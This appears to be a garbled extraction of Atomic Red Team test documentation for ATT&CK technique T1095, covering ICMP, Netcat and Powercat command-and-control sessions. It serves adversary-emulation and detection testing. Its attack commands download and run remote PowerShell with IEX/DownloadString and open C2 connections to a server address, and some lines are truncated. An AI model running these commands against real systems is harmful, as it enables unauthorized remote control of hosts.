

T1095	- Non-Application	Layer	<b>Protocol</b>

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Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over

ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used

This will attempt to start C2 Session Using ICMP. For information on how to set up the listener refer to the following blog: https://www.blackhillsinfosec.com/how-to-c2-over-

auto\_generated\_guid: 0268e63c-e244-42db-bef7-72a9e59fc1fc

Name	Description	Туре	Default Value	
server_ip	The IP address of the listening server	String	127.0.0.1	

T1037.001

T1037.002

T1037.004

T1037.005

T1039

T1040

IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.github  $\Box$ Invoke-PowerShellIcmp -IPAddress #{server\_ip}

# Atomic Test #2 - Netcat C2

Start C2 Session Using Ncat To start the listener on a Linux device, type the following: nc -l р

Supported Platforms: Windows

auto\_generated\_guid: bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37

#### Inputs:

Name	Description	Туре	Default Value
server_port	The port for the C2 connection	Integer	80
ncat_exe	The location of ncat.exe	Path	\$env:TEMP\T1095\nmap-7.80\ncat.exe
ncat_path	The folder path of ncat.exe	Path	\$env:TEMP\T1095
server_ip	The IP address or domain name of the listening server	String	127.0.0.1

### Attack Commands: Run with powershell!

```
cmd /c #{ncat_exe} #{server_ip} #{server_port}
```

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Dependencies: Run with powershell!

Description: ncat.exe must be available at specified location (#{ncat\_exe})

**Check Prereq Commands:** 

```
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if( Test-Path "#{ncat_exe}") {exit 0} else {exit 1}
```

### **Get Prereq Commands:**

```
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]
New-Item -ItemType Directory -Force -Path #{ncat_path} | Out-Null
$parentpath = Split-Path (Split-Path "#{ncat_exe}"); $zippath = "$parent
Invoke-WebRequest "https://nmap.org/dist/nmap-7.80-win32.zip" -OutFile
  Expand-Archive $zippath $parentpath -Force
  $unzipPath = Join-Path $parentPath "nmap-7.80"
if( $null -eq (Get-ItemProperty HKLM:\Software\Microsoft\Windows\Current'
  Start-Process (Join-Path $unzipPath "vcredist_x86.exe")
}
```

# Atomic Test #3 - Powercat C2

Start C2 Session Using Powercat To start the listener on a Linux device, type the following: nc

Supported Platforms: Windows

auto\_generated\_guid: 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e

#### Inputs:

Name	Description	Туре	Default Value
server_ip	The IP address or domain name of the listening server	String	127.0.0.1
server_port	The port for the C2 connection	Integer	80

# Attack Commands: Run with powershell!

IEX (New-Object System.Net.Webclient).Downloadstring('https://raw.github powercat -c #{server\_ip} -p #{server\_port}